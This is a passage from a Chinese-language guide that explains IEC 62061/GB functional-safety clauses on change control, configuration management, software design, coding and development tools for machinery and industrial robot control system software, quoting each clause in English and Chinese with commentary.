(8)要维护好所有配置项目的唯一标识,除了要对配置项目的用途、型号进行管理,还要确定配置项目的版本。即使对同一个配置项,不同版本下也是存在一定差异的。对所有配置项的正确维护,对保持SRECS的完整性是相当必要的。 (9)机械/工业机器人控制系统软件的修改流程文件也应纳入配置管理。管理软件修改流程具有以下作用。 ·能够防止未经授权的对软件的修改。未经授权修改的软件,会被配置管理员拒绝进入配置管理库。 ·每次要求的变更应能够形成日志记录。利用这个日志记录,可以分析要求变更的全部细节。 ·分析所提出的变更要求带来的影响,负责开发机械/工业机器人控制系统软件的机构应该决策是否批准或拒绝这个变更要求。 ·当变更要求被批准后,所有的修改细节、授权文件都要进入配置管理库。日后将作为证据参与产品认证、责任调查等活动。 ·在机械/工业机器人控制系统软件开发过程中,要在适当的时间点建立配置基线,并且要记录集成测试的部分或全部结果。这个集成测试的结果,是用来证明基线是正确的,即开发过程完成了阶段性的任务,进入了新的阶段。 ·确保机械/工业机器人控制系统软件所有的基线组成及构建成果被合适地保存,即安全地保存各个基线的全部软件模块及构建后的软件执行体、配置数据等。 (10)配置管理要管理每次变更的效果分析,要对每个变更要求进行评定。这个分析既包括合适的危险分析,也要考虑SRECS的所有其他修改活动。 (11)对SRECS产生影响的所有可接受的变更,一旦确定要实施,就应返回机械/工业机器人控制系统软件的恰当设计阶段。例如,需要修改软件需求时,应返回软件需求分析阶段,形成新的需求规范;当软件设计发生修改时,应返回设计阶段;如果软件需要变更内部参数,重新进行集成,则应返回集成阶段;如果软件需要以新的参数进行重新安装,则应返回安装阶段;如果需要变更测试用例,重新进行软件的试运行或确认,则应返回对应的试运行或确认阶段。 (12)配置管理库中要记录所有执行的必要操作,作为证据证明修改后的机械/工业机器人控制系统软件已经达到所要求的安全完整性。 (13)影响分析结果出来后,要根据分析结果确定变更要求所必须执行的活动,这些活动的授权同样需要被保存。 6.2.3 变更过程的文件记录 【IEC标准条款】 9.3.3 The documentation of the change control process shall contain at least a) a plan of each modification process; b) a documentation of each of the above mentioned organizational requirements and procedures; c) a documentation of the decision making process and each SRECS-relevant decision made; d) a chronological documentation (logbook) of the change request procedures including ·identified hazards which may be affected; ·description of the change request (hardware and/or software); ·reason(s) for the change request (see also 9.2.1); ·decision made (and authorization for each decision); ·the impact analysis; ·re-verification (of each phase) and revalidation; ·all documents affected by the change request activities; ·all activities which were carried out during the change process and the persons/entities who were responsible for them; e) documentation of the following information to permit a subsequent audit: ·configuration status; ·release status; ·the justification for and approval of all modifications; ·the details of the modification. 【GB标准条款】 9.3.3 变更过程的文件应至少包括: a)每个修改过程的计划。 b)上述提及的要求和程序文件。 c)决策过程和各有关SRECS的决定做出的文件。 d)改变要求程序的按时间顺序排列的文件(工作日志),包括: ·识别可能受影响的危险; ·改变要求(硬件和/或软件)的描述; ·改变要求的原因(见9.2.1); ·做决定(和每个决定的授权); ·影响分析; ·重新验证(对各阶段)和重新确认; ·受改变要求活动影响的所有文件; ·在改变过程中执行的所有活动和负责这些活动的人/实体。 e)下列信息的文件,允许随后审查: ·配置状况; ·发布状态; ·所有修改和批准的理由; ·修改的细节。 1. 条款目的与意图 条款9.3.3对变更过程文件的内容进行了要求。 2. 条款解释与示例 条款9.3.3指出了变更过程中文件的必要元素,即最低要求,包括以下内容。 第一,每个修改过程的计划。计划描述了修改的内容、步骤、环境工具、人力资源、进度安排等。 第二,上述提及的要求和程序文件,如SRECS功能安全要求、配置管理程序等。必要时,可以通过文档引用方式,避免、降低文档之间的冗余性。 第三,描述变更活动的决策过程及各个有关SRECS的决定文件,如工作纪要、会议纪要、批准文件等。 第四,变更过程文件要按照时间顺序记录。 (1)危险分析结果文档。识别机械/工业机器人控制系统软件在修改过程中可能产生的危险因素。 (2)描述需要调整、修改的机械/工业机器人控制系统软件需求,用没有歧义、清晰的文字,给出具体的、明确的变更要求。 (3)说明为什么要对机械/工业机器人控制系统软件需求进行修改,可以从紧迫性、必要性等方面进行分析(见标准条款9.2.1)。 (4)做出的决定,描述本次修改如何实施、包括哪些步骤,并且要给出每个决定的授权,即批准某个决定的签批文件。 (5)影响分析。分析本次修改对机械/工业机器人控制系统软件已有模块、已实施工作产生怎样的影响。 (6)重新验证(对各阶段)和重新确定。记录对机械/工业机器人控制系统软件修改过程各阶段的重新验证,以及重新确定的过程、结果,即将回归测试用例经过充分讨论的签批意见归档。 (7)受需求变更活动影响的所有文件,均要进行版本升级并归档。 (8)需要记录在机械/工业机器人控制系统软件需求变更中执行的所有活动,负责实施每个活动的人或实体,都应有相应的签名记录。 以上内容和标准条款9.3.1基本一致。 第五,下列记录信息运行后需要进行审查。 (1)机械/工业机器人控制系统软件的配置状况,即每个基线的所有配置项组成、型号、版本等情况。 (2)机械/工业机器人控制系统软件发布的状态,如发布的时间、版本、责任人、版权归属等信息。 (3)机械/工业机器人控制系统软件所有修改和批准的理由,均记录在批准文件中。 (4)机械/工业机器人控制系统软件所有修改的细节,包括文档和代码两方面,如软件需求、设计文档的变更,以及软件代码的修改等。 第7章 安全相关机械/工业机器人控制系统软件设计和开发指南 7.1 概述 【IEC标准条款】 C.1 General This Annex is provided to assist persons in the design and development of embedded software for implementing safety-related control functions within a SRECS. The major objective dealt with here is general guidance on the prevention of embedded software failures and any other unexpected behaviour of embedded software that might lead to the creation of dangerous faults in the system. In order to satisfy these objectives,consideration is given to the following points: -a description of the main characteristics that software elements of a SRECS should possess to guarantee its quality and safety (software element guidelines); -the establishment of all relevant technical activities and provisions associated with software development,for those involved in software design.These can then be used to guide the designer during the production of this type of software (software development process guidelines); -a reference framework for software evaluation.This allows the software designer and/or analyst to decide that software elements satisfy the safety requirements of the SRECS or SRECS subsystem to be analysed (software verification guidelines). This Annex provides a set of basic guidelines,coherent with the IEC 61508-3,that are adapted to embedded software for microprocessors. 【GB标准条款】 C.1 综述 本附录用于帮助人们设计和开发嵌入式软件以实现SRECS内的安全相关控制功能。 主要目标是进行总体指导,防止嵌入式软件失效和嵌入式软件的其他意外行为,避免导致系统产生危险故障。 为达到这些目标,应考虑下列几点: ——SRECS软件要素主要特性的描述,应保证质量和安全性(软件要素指导); ——对于那些涉及软件的设计,要确立所有相关技术活动和软件开发的有关规定,在开发此类软件的制作期间,可用于指导设计者(软件开发过程指导); ——软件评估的参考性框架,让软件设计人员和/或分析人员决定软件要素是否符合SRECS或要被分析的SRECS子系统的安全要求(软件验证指导)。 本附录提供一套基本指导,与IEC 61508-3一致,适用于微处理器的嵌入式软件。 1. 条款目的与意图 附录C规定了满足IEC 61508-3要求的基本做法,如果不采取进一步的措施,则不能保证与IEC 61508-3完全一致。 2. 条款解释与示例 附录C是用于帮助人们设计和开发机械/工业机器人控制系统软件,以实现SRECS内的安全相关控制功能。 主要目标是进行总体指导,防止机械/工业机器人控制系统软件失效和其他意外行为,避免系统产生危险故障。 为了达到这些目标,应考虑以下几点。 (1)软件要素指导。对SRECS软件要素主要特性的描述,要保证质量和安全性。软件要素是确保机械/工业机器人控制系统软件安全特性的基础。条款C.2针对SRECS软件要素指导展开了说明。 (2)软件开发过程指导。对于涉及软件设计过程的事宜,确立所有相关技术活动和软件开发的有关规定。在开发此类软件的制作期间,这些确立好的内容可用于指导设计者。软件开发过程指导是保障机械/工业机器人控制系统软件安全可靠的核心内容。条款C.3到C.5针对软件开发指导过程展开了描述。 (3)软件验证指导。该部分是软件评估的参考性框架,旨在让软件设计人员、分析人员决定软件要素是否符合SRECS或其子系统的安全要求。软件验证指导是保障和确认机械/工业机器人控制系统软件安全可靠的重要手段。条款C.6到C.9针对软件验证指导的内容展开了描述。 附录C提供的这一套基本指导规则,与IEC 61508-3一致,适用于微处理器的机械/工业机器人控制系统软件。 7.2 软件要素 7.2.1 软件架构界面 【IEC标准条款】 C.2 Software element guidelines This Clause presents the guidelines that an embedded software element of a SRECS orSRECS subsystem should fulfil to be safe in operation and of satisfactorily high quality.To obtain such a software element,a number of activities,a certain organisation and a number of principles should all be established.This should take place as early as possible in the development cycle. C.2.1 Interface with system architecture The list of constraints imposed by hardware architecture on software should be defined and documented.Consequences of any hardware/software interaction on the safety of the machine or system being monitored should be identified and evaluated by the designer,and taken into account in the software design. NOTE Constraints include:protocols and formats,input/output frequencies,by rising and falling edge or by level,input data using reverse logic,etc.Listing these constraints allows them to be taken into account at the start of the development activity,and reduces the risk of incompatibilities between software and hardware when the former is installed in the target hardware. 【GB标准条款】 C.2 软件要素指导 本条款表述指导方针,即SRECS或SRECS子系统的嵌入式软件要素应符合操作安全和高质量要求。为了获得这类软件要素,应确立若干活动、若干组织和若干原则,并在开发周期内尽早进行。 C.2.1 系统结构界面 硬件结构对软件施加的限制应定义并形成文件。对于被监控的机器或系统的安全性,任何软件/硬件相互作用的结果应由设计者识别和评估,并在设计软件时考虑。 注:限制包括协议和格式、输入/输出频率、上升沿/下降沿或电平、输入数据采用负逻辑等。列出这些限制可以使其在开发活动之初就被纳入考虑范围,当软件用于目标硬件时,应减少软件和硬件之间不兼容的风险。 1. 条款目的与意图 条款C.2主要讲的是机械/工业机器人控制系统的软件要素指导,即软件要素包含哪些、如何实现等。其中,条款C.2.1讲述了系统结构界面这个要素。 2. 条款解释与示例 条款C.2讲述的是这样一个指导方针,SRECS或其子系统的嵌入式软件要素应充分履行,以保证操作的安全和高质量。为了获得这类软件要素,应确立若干活动、若干组织和若干原则,并在开发周期内尽早进行。 首先,条款C.2.1中提出了系统结构界面这一软件要素。系统结构界面是指软件和硬件之间的边界。硬件结构对软件施加的约束应定义并形成文件。对于被监控的机器或系统的安全性,任何软件或硬件相互作用的结果应由设计者识别和评估,并应在设计软件时考虑。 需要注意的是,硬件结构对软件施加的约束包括协议和格式、输入/输出频率、上升沿/下降沿或电平、输入数据采用负逻辑等。列出这些限制的原因是,可以使其在开发活动之初就被纳入考虑范围,当软件用于目标硬件时,应使得软件和硬件之间不兼容的风险降低。 对比软件和硬件,软件具有极大的灵活性,而硬件的灵活性较差。因此,软件要适配硬件的特性,反过来说,硬件对软件具有一定的约束性。对于机械/工业机器人控制系统软件,机器人本体或伺服系统的协议和格式、输入/输出频率、上升沿/下降沿或电平、输入数据采用负逻辑等特性是确定的、无法改变的,因此在设计软件的早期,应全面分析硬件部分的约束。因此,设计师应该考虑机器人系统模块的替代特性,不能仅仅着眼于当前使用的硬件,这样能够在软件设计的起步阶段提升软件的适应性,增强机器人系统的整体维护性。 根据笔者以往的经验,硬件对软件的约束通常会在软件需求规格说明中以软件需求项的约束条件出现,而关于硬件和软件之间的协议约束,通常会作为一种接口协议规范在接口设计文档中详细叙述。此外,根据一般经验,在软件需求规格说明的系统概述部分和外部接口部分都应给出软件的外部接口图和接口的相关信息,如接口的名称、标识、遵循的规范、数据方向、发送端、接收端等。 7.2.2 软件规范(软件需求规格说明) 【IEC标准条款】 C.2.2 Software specifications Software specifications should take the following points into account: -safety-related control functions with a quantitative description of the performance criteria (precision,exactness) and temporal constraints (response time),all with tolerances or margins when possible; -system configuration or architecture; -instructions relevant to hardware safety integrity (logic solvers,sensors,actuators,etc.); -instructions relevant to software integrity; -constraints related to memory capacity and system response time; -operator and equipment interfaces; -instructions for software self-monitoring and for hardware monitoring carried out by the software; -instructions that allow all the safety-related control functions to be verified while the systems are working (e.g.on-line testing,capture time for fleeting signals,coincidence with scan rate). NOTE1 The instructions for monitoring,developed taking safety objectives and operating constraints (duration of continuous operation,etc.) into account,can include devices such as watch dogs,central processing unit (CPU) load monitoring,feedback of output to input for software self-monitoring.For hardware monitoring,CPU and memory monitoring,etc.instructions for safety-related control function verification:for example,the possibility ofperiodically verifying the correct operation of safety devices should be included in the specifications. Functional requirements should be specified for each functional mode.The transition from one mode to the other should be specified. NOTE2 Functional modes can include nominal modes,and one or more degraded modes.The objective is to specify the behaviour in all situations in order to avoid unexpected behaviours in non-nominal contexts. 【GB标准条款】 C.2.2 软件规范 软件规范应考虑下列各项: ——安全相关控制功能具有对性能准则(精确度、准确度)和瞬时限制(响应时间)的定量描述,可能时,应考虑所有因素的容差或余量; ——系统配置或结构; ——说明有关硬件安全完整性(逻辑解算器、传感器、执行器等); ——说明有关软件完整性; ——有关存储器容量和系统响应时间的限制; ——操作者和设备界面; ——软件自我监控和由软件执行的硬件监控的说明; ——当系统运行时允许对所有安全相关控制功能进行验证的说明(例如,在线测试,快速信号的捕获时间,与扫描频率一致)。 注1:用于监控的说明,考虑开发的安全目标和操作限制(持续操作时间等),可能包括某些装置,如看门狗、中央处理器(CPU)加载监控、输出反馈至输入实现软件自监控。对于硬件监控,如CPU和存储器监控等,安全相关控制功能验证的说明:定期验证安全装置正确操作的可能性应包括在规范中。 对于各功能模式,应规定其功能要求。一种模式到另一种模式的切换也应该规定。 注2:功能模式可包括正常模式和一个或多个降级模式。目的是规定所有情况下的行为,以避免在非正常模式下的意外行为。 1. 条款目的与意图 条款C.2.2是机械/工业机器人控制系统软件的规范(从工程角度看,这里的规范即软件需求规格说明)要求,给出了规范应覆盖的内容,指导开发设计人员完善软件需求。 2. 条款解释与示例 需要说明的是,考虑安全目标和操作限制(持续操作时间等)而开发的监控措施,可能包括某些装置,如看门狗、中央处理器(CPU),通过加载监控数据、输出到输入的反馈等信息,实现软件自监控。对于硬件监控,对CPU和存储器监控等的安全相关控制功能验证措施如下:规范文件中应包含安全装置在定期自检情况下保持正常状态的概率分布。 通常,在评审软件需求规格说明的时候,会引用一份软件需求规格说明检查单,对需求文档的内容进行逐项评审。这里的检查单,一般要包含标准中列举的要求。对于一些主观性较强的条款、要求,需要由有经验的评审人员判断软件需求分析是否充分。 软件规范(软件需求规格说明)中,各个功能模式下的功能性需求要描述清楚,并且不同模式之间的转换关系也要在规范中说明。在标准GJB 438B—2009《军用软件开发文档通用要求》中,软件需求规格说明文档的3.1节描述了软件各种运行模式的转换关系,通常要求采用状态转换图来描述软件状态的转换关系。 需要注意的是,功能模式包括正常模式和一个或多个降级模式,目的是规定所有情况下的行为,以避免在非正常模式下出现意外行为。所谓降级模式,就是软件发现系统的某些模块发生故障而失效,但是系统仍处于可控的状态,安全完整性暂时未受到破坏,而软件能够控制系统完成部分功能的一种模式。而当安全完整性受到破坏时,软件应该立即控制系统进入安全模式,直到安全完整性得到恢复。 7.2.3 预存软件(已经存在的软件) 【IEC标准条款】 C.2.3 Pre-existent software The term "pre-existent" software refers to source modules that have not been developed specifically for the system at hand,and are integrated into the rest of the software.These include software elements developed by the designer for previous projects,or commercially available software (e.g.modules for calculations,algorithms for data sorting). When dealing with this type of software,and especially in the case of commercial software elements,the designer does not always have access to all the elements needed to satisfy the previous requirements (e.g.what tests have been carried out,is the design documentation available).Specific co-ordination with the analyst can therefore be necessary at the earliest possible moment. The designer should indicate the use of pre-existent software to the analyst,and the designer should demonstrate that pre-existent software has the same level as the other software elements.Such a demonstration should be done: a) either by using the same verification activities on the pre-existent software as on the rest of the software;and/or b) through practical experience where the pre-existent software has functioned on a similar system in a comparable executable environment (e.g.it may be necessary to evaluate the consequences of a change of the compiler or of a different software architecture format). NOTE1 The goal of indicating the use of pre-existent software is to open up consultation with the analyst as early as possible about any eventual difficulties that this type of software might cause.The integration of pre-existent source modules can be the cause of certain anomalies or unsafe behaviour if they were not developed with the same rigour as the rest of the software. Pre-existent software should be identified using the same configuration management andversion control principles that are applied to the rest of the software. NOTE2 Configuration management and version control should be exercised over all the software components,regardless of their origin. 【GB标准条款】 C.2.3 预存软件 术语“预存软件”是指还没有为现有系统具体开发并集成到软件其余部分中的源模块,包括先前项目设计人员开发的软件元素或商用软件(如计算、数据排序算法模块)。 当处理这类软件元素,特别是商用软件时,设计人员并不是总能访问用以满足预先要求所需的所有要素(例如,已经进行什么测试?设计文件是否可得到?)。因此,在早期需要与分析人员具体协调。 设计人员应向分析人员指示预存软件的使用。设计人员应证明预存软件具有和其他软件元素同样的水平。这类证明应做到: a)对预存软件采用与软件其他部分同样的验证活动; b)在可比的执行环境中,预存软件有相比类似系统的作用时,通过实际经验证明(如可能需要评估编译程序更改或不同软件架构格式更改的后果)。 注1:指示预存软件使用的目标是就该类软件可能导致的任何意外困难与分析人员尽早协商。如果预存源模块的开发不如软件其余部分严格,那么其集成可能会导致某些异常或不安全行为。 预存软件应采用与其他软件部分相同的配置管理和版本控制原则识别。 注2:应行使对所有软件元件的配置管理和版本控制,不管其来源。 1. 条款目的与意图 条款C.2.3规定了机械/工业机器人控制系统软件在使用预存软件或模块时如何确保安全性不受影响。 2. 条款解释与示例 设计人员向分析人员指示预存软件的使用,即通知分析人员,在本次项目中预计会使用预存软件。 在此强调,设计人员应该充分认识到使用预存软件虽然能够提高开发设计的效率,但是在质量和安全方面是存在风险的。一般来说,预存软件无非就是两大类:一类可以获得完整的代码、文档;另一类只有二进制包,缺少代码和文档。对于前者,开发人员要花费时间考核预存软件的可靠性和安全性,增加了预估工作的难度和进度风险。对于后者,其质量更不可靠,如果时间允许,则优先采用自研软件,其次采用文档和代码齐全的预存软件,万不得已的时候才用缺少代码和文档的预存软件。 7.2.4 软件设计 【IEC标准条款】 C.2.4 Software design Description of the software design should include a description of: -the software architecture that defines the structure decided to satisfy specifications; -inputs and outputs (e.g.in the form of an internal and external data dictionary),for all the modules making up the software architecture; -the interrupts; -the global data; -each software module (inputs/outputs,algorithm,design particularities,etc.); -module or data libraries used; -pre-existent software used. Software should be modular and written in a logical manner in order to facilitate its verification or maintenance: -each module or group of modules should correspond,if possible,to a function in the specification(s); -interfaces between modules should be as simple as possible. NOTE The general characteristic of correct software architecture can be summed up in the following way:a module should possess a high level of functional cohesion and a simple interface with its environment. Software should: -limit the number or extent of global variables; -control the layout of arrays in memory (to avoid a risk of array overflows). 【GB标准条款】 C.2.4 软件设计 软件设计的描述应包括下列内容: ——定义符合规范要求结构的软件架构; ——所有构成软件架构模块的输入和输出(如以内部和外部数据字典的形式); ——中断; ——全局数据; ——各软件模块(输入/输出、算法、设计特性等); ——使用的模块或数据文件库; ——使用的预存软件。 软件应以逻辑方式划分模块和编写,以便验证或维护: ——若可能,则每一个模块或模块组应对应规范中的某项功能; ——模块间的接口应尽量简化。 注:正确软件架构的总体特征可总结为,模块应拥有高水准的功能内聚及与所处环境的简单接口。 软件应: ——限制使用全局变量的数目或程度; ——在存储器中,数组控制分布(避免数组溢出的风险)。 1. 条款目的与意图 条款C.2.4规定了机械/工业机器人控制系统软件在设计阶段需要重点考虑的内容,以及软件设计文档中应该描述的内容。 2. 条款解释与示例 软件设计的描述应包括软件架构、输入和输出、中断、全局数据、各软件模块、模块或数据文件库、预存软件。 为了方便进行验证或维护,应该以逻辑方式划分模块和编写软件,并且要简化模块间的接口。 7.2.5 软件编码 【IEC标准条款】 C.2.5 Coding The source code should: -be readable,understandable,and subject to tests; -satisfy design specifications of the software module; -obey the coding manual instructions. 【GB标准条款】 C.2.5 编码 源代码应: ——可读、可理解和接受测试; ——满足软件模块的设计规范; ——遵循编码手册说明。 1. 条款目的与意图 条款C.2.5规定了机械/工业机器人控制系统软件在编码阶段需要引起重视的要求。 2. 条款解释与示例 软件开发的源代码应满足下列要求。 (1)可读、可理解和接受测试。能够让代码编写者以外的开发人员、维护人员、测试人员快速理解代码意图。代码的调试信息足够丰富,便于调试和跟踪。 (2)满足软件模块的设计规范。设计规范是指整个机械/工业机器人控制系统软件的设计文档。软件要满足设计规范中明确列出的各项功能、性能指标和对外接口要求,不得有缺项、漏项。 (3)遵循编码手册说明。代码编写要符合单位内部、客户、行业规范要求的编码规范。这类规范就是此处所说的编码手册说明。 7.3 软件开发流程 7.3.1 软件的生命周期 【IEC标准条款】 C.3 Software development process guidelines C.3.1 Development process:software lifecycle The objective of the following guidance applicable to the software lifecycle is to obtain a formalized description of the organization of software development and,in particular,the different technical tasks making up this development. The software development lifecycle should be specified and documented (e.g.in a software quality plan).The lifecycle should include all the technical activities and phases necessary and sufficient for software development. Each phase of the lifecycle should be divided into its elementary tasks and should include a description of: -inputs (documents,standards,etc.); -outputs (documents produced,analytical reports,etc.); -activities to be carried out; -verifications to be performed (analyses,tests,etc.). 【GB标准条款】 C.3 软件开发过程指导 C.3.1 开发过程:软件生命周期 以下适用于软件生命周期的指导旨在获取软件开发组织的正式化描述,特别是构成该开发的不同技术任务。 应当详细规定和文件化软件开发生命周期(例如在软件质量计划中)。生命周期应包括软件开发所必需的所有技术活动和必要阶段。 生命周期各阶段应分成不同基本任务,并应包括下述描述: ——输入(文件、标准等); ——输出(制作的文件、分析性报告等); ——执行的活动; ——进行的验证(分析、测试等)。 1. 条款目的与意图 条款C.3是软件开发过程指导。条款C.3.1描述了开发过程中软件的生命周期,为开发人员描绘了一个较为清晰的软件生命周期蓝图。 2. 条款解释与示例 国标存在明显的翻译错误,让人难以理解含义。根据笔者对IEC标准的理解,C.3.1指出接下来的软件生命周期是为了让软件开发的组织,形成一个规范化的描述,也就是区分责任、输入、产出等细节。在复杂、大型软件的开发过程中,涉及多种复杂的任务,因此有必要以文档形式把各事项明确下来。机械/工业机器人控制系统软件就属于这类软件。 条款C.3.1指出软件生命周期应该清晰化和文档化,给出的例子是在软件质量计划中描述清楚软件生命周期的内容,不是强制要求的,各个组织可以根据项目的需要,在合适的文档中说明相关软件生命周期的内容与要求。 条款C.3.1指出生命周期各阶段应分成不同的基本任务,描述每个阶段的输入(文件、合同、标准等)、输出(制作的文件、分析性报告等)、执行的活动、进行的测试(分析、测试等)等。对于机械/工业机器人控制系统软件,其生命周期主要包括需求分析、系统设计、软件编码、测试验证等阶段。每个阶段可能还会细分为不同的子阶段。在项目开始之前,就应该把整个项目的环节、活动、里程碑等要素形成计划文档,后续活动严格按照计划开展。当然,在项目的执行过程中,计划可能需要调整。此时,计划变更需要经过讨论、分析、审批等必要的项目管理环节。这就对项目的参与人提出了划分权限的要求,涉及项目管理的相关内容,建议读者查阅项目管理的相关标准。 7.3.2 软件开发过程中的文件管理 【IEC标准条款】 C.3.2 Documentation:documentation management The documentation should conform to Clause10 of this standard. 【GB标准条款】 C.3.2 文件:文件管理 文件应符合本标准第10条的规定。 1. 条款目的与意图 条款C.3.2为软件开发过程中文档管理的要求和方法。 2. 条款解释与示例 文件应符合标准第10章对文档管理的要求,同时标准第10章的要求也是软件开发过程中文档管理的方法。 7.3.3 配置和软件修改管理 【IEC标准条款】 C.3.3 Configuration and software modification management Management of the configuration and therefore of the version is an indispensable part of any development which may require approval.Indeed,approval is only valid where a given configuration can be identified.Configuration management includes configuration identification activities,modification management,the establishment of reference points and the archiving of software elements,including the associated data (documents,records of tests,etc.).Throughout the entire project lifecycle,the principal objectives are to provide: -a defined and controlled software configuration that guarantee physical archiving and that can be used to reproduce an executable code coherently (with future software production or modification in mind); -a reference basis for modifications management; -a means of control so that any problems are properly analysed,and that the approved modifications are properly carried out. Concerning the modifications,their reasons could arise from,for example: -functional safety below that specified; -systematic fault experience; -new or amended safety legislation; -modifications to the machine or its use; -modification to the overall safety requirements; -analysis of operations and maintenance performance,indicating that the performance is below target. 【GB标准条款】 C.3.3 配置和软件修改管理 配置管理和版本管理是任何开发都不可或缺的部分。两者可能都需要进行批准。事实上,只有当提供的配置能够识别时,该批准才有效。配置管理包括配置项识别活动、修改管理、建立参考点和软件元素归档,包括相关数据(文件、测试记录等)。配置管理贯穿整个项目生命周期,主要目标是提供: ——定义的和受控的软件配置,该配置保证物理归档和用于重新生成前后一致的可执行代码(考虑未来软件制作或修改); ——修改管理的参考基础; ——控制方法,使任何问题能进行正确分析,经批准的修改能正确执行。 有关修改,原因可来自多个方面,例如: ——功能安全低于规定; ——系统故障经验; ——新的或修正的安全法规; ——对机器或其使用的修改; ——对总体安全要求的修改; ——操作和维护性能的分析,指示性能低于目标。 1. 条款目的与意图 条款C.3.3规定了开发过程中软件修改的配置和管理要求,以及相关的操作方法。 2. 条款解释与示例 机械/工业机器人控制系统软件是一款需要批准、获得认可才可以上市的产品。条款C.3.3指出,在机械/工业机器人控制系统软件开发项目中,配置管理和版本管理活动是不可或缺的。只有当提供的配置项能够识别时,审批活动才有意义。这里要指出,配置项就是机械/工业机器人控制系统软件中可以独立运行的各个软件模块。在具体项目中,控制器内部可能包括多个处理器,处理器可能运行多个执行程序,单个执行程序即可作为一个配置项。一个配置项的内容包括执行程序的执行体、源代码、配套文档。在执行程序进行设计、编码的时候,版本不断更新,要进行各种配置活动,如文档和代码的出入库,记录版本更新的差异,测试过程中发现的问题。审批活动就是基于配置管理中记录的这些信息而进行的。条款C.3.3指出了配置管理包含配置项识别活动(划分配置项)、修改管理、建立参考点(可以理解为建立里程碑)和软件元素归档。配置管理的目的体现在3个方面:一是定义的和受控的软件配置,用于保证物理归档和重新生成前后一致的可执行代码,换句话说,在版本不更新的情况下,对同一个配置项执行出库操作,得到的是同样的内容;二是修改管理的参考基础,开发人员和质量人员可以通过比对配置内容的差异,进行修改管理;三是控制方法,使任何问题能进行正确分析,经批准的修改能正确执行。有了配置管理的记录作为原始素材,才能对问题进行追溯和分析,更好地提升软件的质量。 7.3.4 配置和归档管理 【IEC标准条款】 C.3.4 Configuration and archiving management A procedure for configuration management and modifications management should be defined and documented.This procedure should,as a minimum,include the following items: -articles managed by the configuration,at least:software specification,preliminary and detailed software design,source code modules,plans,procedures and results of the validation tests; -identification rules (of a source module,of a software version,etc.); -treatment of modifications (recording of requests,etc.). For each article of configuration,it should be possible to identify any changes that may have occurred and the versions of any associated elements. NOTE1 The purpose is to be able to trace the historical development of each article:what modifications have been made,why,and when. Software configuration management should allow a precise and unique software version identification to be obtained.Configuration management should associate all the articles (and their version) needed to demonstrate the functional safety. All articles in the software configuration should be covered by the configuration management procedure before being tested or being requested by the analyst for final software version evaluation. NOTE2 The objective here is to ensure that the evaluation procedure be performed on software with all elements in a precise state.Any subsequent change may necessitate revision of the software so that it can be identifiable by the analyst. Procedures for the archiving of software and its associated data should be established (methods for storing backups and archives). NOTE3 These backups and archives can be used to maintain and modify software during its functional lifetime. 【GB标准条款】 C.3.4 配置和归档管理 应规定配置管理和修改管理程序和文件。该程序至少应包括下列项目: ——配置管理的各细项,至少包括软件规范、初步和详细的软件设计、源代码模块、计划、程序和确认测试的结果; ——识别规则(源模块、软件版本等); ——修改处理(要求记录等)。 配置的各项应能识别可能发生的任何更改和相关元素的版本。 注1:目的是追溯各项开发历史:进行过哪些修改,为什么进行修改,什么时候进行的修改。 软件配置管理应允许准确和唯一的软件版本识别。配置管理应关联所有需要证明功能安全的项目(和其版本)。 软件配置中的所有项目应在测试或分析人员为最终软件版本评估前由配置管理程序覆盖。 注2:目的是确保对软件执行评估程序时,所有元素处于正确状态。任何后续更改可能是软件修订需要的,因此由分析人员识别。 应建立软件和相关数据的归档程序(备份和档案存储的方法)。 注3:这些备份和档案可用于软件功能生存期内的维护和修改。 1. 条款目的与意图 条款C.3.4规定了开发过程中软件的配置和归档管理要求,以及相关的操作方法。 2. 条款解释与示例 条款C.3.4指出了配置和归档管理所要记录的内容。第一项是配置管理的各细项,也就是通常软件开发流程中的各种成果物,不需要过多解释。第二项是识别规则,笔者认为这里的识别规则包含若干含义:一是不同配置项的名称、标识号、版本号;二是名称、标识号、版本号的命名规则;三是配置项的划分原则或理由。机械/工业机器人控制系统软件比较复杂,配置项可能比较多,如何避免在检索时出现配置项、版本混淆等问题是需要读者注意的地方。第三项是修改处理。从严格意义上讲,每一项的修改都要进行配置管理。反过来,配置管理要记录每一次修改的内容。但在实际操作中,很难做到如此细致,那就要根据项目的重要性进行取舍。 7.3.5 软件修改管理 【IEC标准条款】 C.3.5 Software modifications management Any software modification which has an impact on the functional safety of the SRECS should be subject to the rules established for modification and configuration management such that the development process be recommenced at the highest"upstream"point needed to take the modification into account without diminishing the functional safety. NOTE In particular,the documentation should also be updated,and all necessary verification activities carried out.This guarantees that the software will keep all its initial properties after any modification. 【GB标准条款】 C.3.5 软件修改管理 任何对SRECS功能安全有影响的软件修改应服从为修改和配置管理建立的规则,在不降低功能安全性的情况下,以便在修改所需的最高“上游”点重新开始开发过程。 注:文件也应更新和执行所有需要的验证活动。这将保证软件在修改后能保持所有的初始特性。 1. 条款目的与意图 条款C.3.5规定了开发过程中对软件进行修改时的管理要求,以及相关的操作方法。 2. 条款解释与示例 条款C.3.5暗示在机械/工业机器人控制系统软件开发的前期,要建立修改和配置管理规则,特别是在涉及SRECS功能安全的软件修改方面,应该建立严格的审核规则,可以采取的活动包括开展多轮、多层次的评审会,开展相关测评,实施同行评审等。规则中要明确各活动的顺序、相关人员的权限。这样才能在源头上降低安全风险。 条款还注明,软件的修改要更新文档和执行验证活动,保证修改后的软件保持完好的功能安全完整性。 7.4 软件开发工具 【IEC标准条款】 C.4 Development tools Tools used during the development procedure (compiler,linker,tests,etc.) should be identified (name,reference,version,etc.) in the documentation associated with the software version (e.g.in the version control documentation). NOTE Different versions of tools do not necessarily produce the same results.Precise identification of tools thus directly demonstrates the continuity of the process of generation of an executable version in the event that a version is modified. 【GB标准条款】 C.4 开发工具 开发期间使用的工具(编译程序、连接程序、测试程序等)应在与软件版本有关的文件(如版本控制文件)中标识(名称、参照代号、版本等)。 注:由于工具的不同版本不一定得出相同的结果,因此工具的准确识别可在版本发生修改时,直接证明生成可执行版本过程的连续性。 1. 条款目的与意图 条款C.4规定了开发过程对开发工具的使用要求,以及相关的操作方法。 2. 条款解释与示例 条款C.4指出软件的开发工具需要被识别,也就是配置项的开发工具信息要被记录在项目的数据库中。条款C.4强调,同一个源程序,采用不同版本的开发工具进行编译、连接时,所生成的执行文件可能具有不同的特性。这种情况,笔者在实际的工程项目中也遇到过。举一个简单的例子,在VC 6.0时代,C++语言尚未形成统一的国际标准。C++语言标准发布后,后续版本的C语言编译器都是按照标准设计的。因此部分采用非标准C++语言编写的程序,在VC 6.0编译器下会编译成功,而在新版编译器中会报错。 7.5 软件复制及分发 7.5.1 代码产生(编译) 【IEC标准条款】 C.5 